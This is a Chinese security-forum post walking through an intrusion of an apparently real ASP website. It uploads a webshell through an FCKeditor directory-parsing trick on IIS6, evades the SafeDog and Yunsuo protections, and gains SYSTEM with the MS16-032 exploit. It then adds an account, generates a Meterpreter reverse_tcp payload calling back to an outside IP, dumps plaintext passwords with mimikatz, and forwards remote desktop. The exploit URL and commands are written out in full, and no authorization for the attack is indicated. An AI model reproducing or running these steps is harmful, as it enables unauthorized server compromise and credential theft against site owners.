找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2145|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

8 ?8 o5 I% I) l) F/ W

/ u7 Z7 E7 X+ n, Q5 c3 J5 I9 H6 J# v% |. o& x* d* E; }! l/ k q! g7 e0 W" w9 f: S& I- E& ]) e; i5 G5 @5 w& R6 G! z- @) N; }/ `7 E+ N
) u2 `% a: J1 ?4 K( ?( S: k

' r* z7 w9 N5 o' T
% s3 H& j6 l* H T% x 一、 利用getwebshell
% E1 b. ~) U3 x. m% w% [
+ K) B& ^3 z) I2 m, J6 T# T# H2 r 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
+ O7 s& |- u; h, t1 \/ ?3 O* H
( j3 J' X' ~, g 222.png
1 n# X; {; A. i6 y, r 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
`# s+ |; R- w7 K V333.png
. T4 ~; h, Q, l 下面我们构造一个asp目录,如: 2 q: l$ d( k9 j& E, @

6 }8 m, X0 b/ ~. n: x- P" x# h

! h# K, ?1 G% [3 i7 t5 ?7 v7 E http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 7 w' o* j) \7 o7 F' y

* O9 |) H% i+ P, g$ C3 l

- }7 M5 w B5 ^0 w) a0 \ p7 ] 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
3 I/ M0 d0 E E, _5 f1 M
3 `; R; N& D3 f一、 绕过安全狗云锁提权并且加账号
: e" s- S O. U2 K% p/ {& K 444.png
, H+ G4 x* J' C8 k: a( ?4 f 没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
/ j' ~3 a$ g9 ?0 b1 {; F5 u! C
6 _' t9 |. {( J 如图:
/ \% }8 Y0 h T' a6 B 555.png
% ~( ^! u$ Q1 C7 @" n8 A 然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
) g* u( y' h# q: J s
8 T9 d$ `1 W: X. c* W1 r5 k5 M) V一、 利用metasploit
4 h0 t: X" \/ l+ d
7 F/ T: f$ D0 S# U 首先用pentestbox生成一个64位的payload如下命令
& Q7 [8 e6 K) c8 Q" t& j, p
; ?! T5 o) H+ j! xmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
) m2 i8 O! X0 J0 Y) W1 o
1 G% P0 e' p$ _# [) w8 T" w! w& P; G为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
$ P1 }+ z; D3 Z# H5 P 11.png
) E# d. P! u9 c6 c U! [" a$ k( O下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
7 d! z& L6 r x0 G. ~3 h 13.png
( W- ~% b' s8 c4 @7 g 下面我们来做一个监听如下命令:
$ {2 O7 f& _, F, C0 T+ m
7 w, j- U3 I# o2 U8 \portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
1 R9 C( P' K0 q 18.png + P7 B/ d1 B& x

# i* r, t8 b/ ]# {: y! k
+ e2 W$ S) k5 @8 I" ~- o* o

- H: g4 O1 T$ D

8 A3 k; B% y' Q) F$ p( [' q
6 ?. X* D, Z' O
! Z, L$ H) ^; |- Y * o% H- Q3 P5 x7 m8 e7 I

( @3 W! D' t6 A7 t6 K+ @# u
1 C9 A7 g* W8 R/ B; x 8 N. F1 t* h) Q7 ~- X

' j2 x7 X, A9 a3 G: h
6 Y) C& a6 k0 |. N+ d6 t, s

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表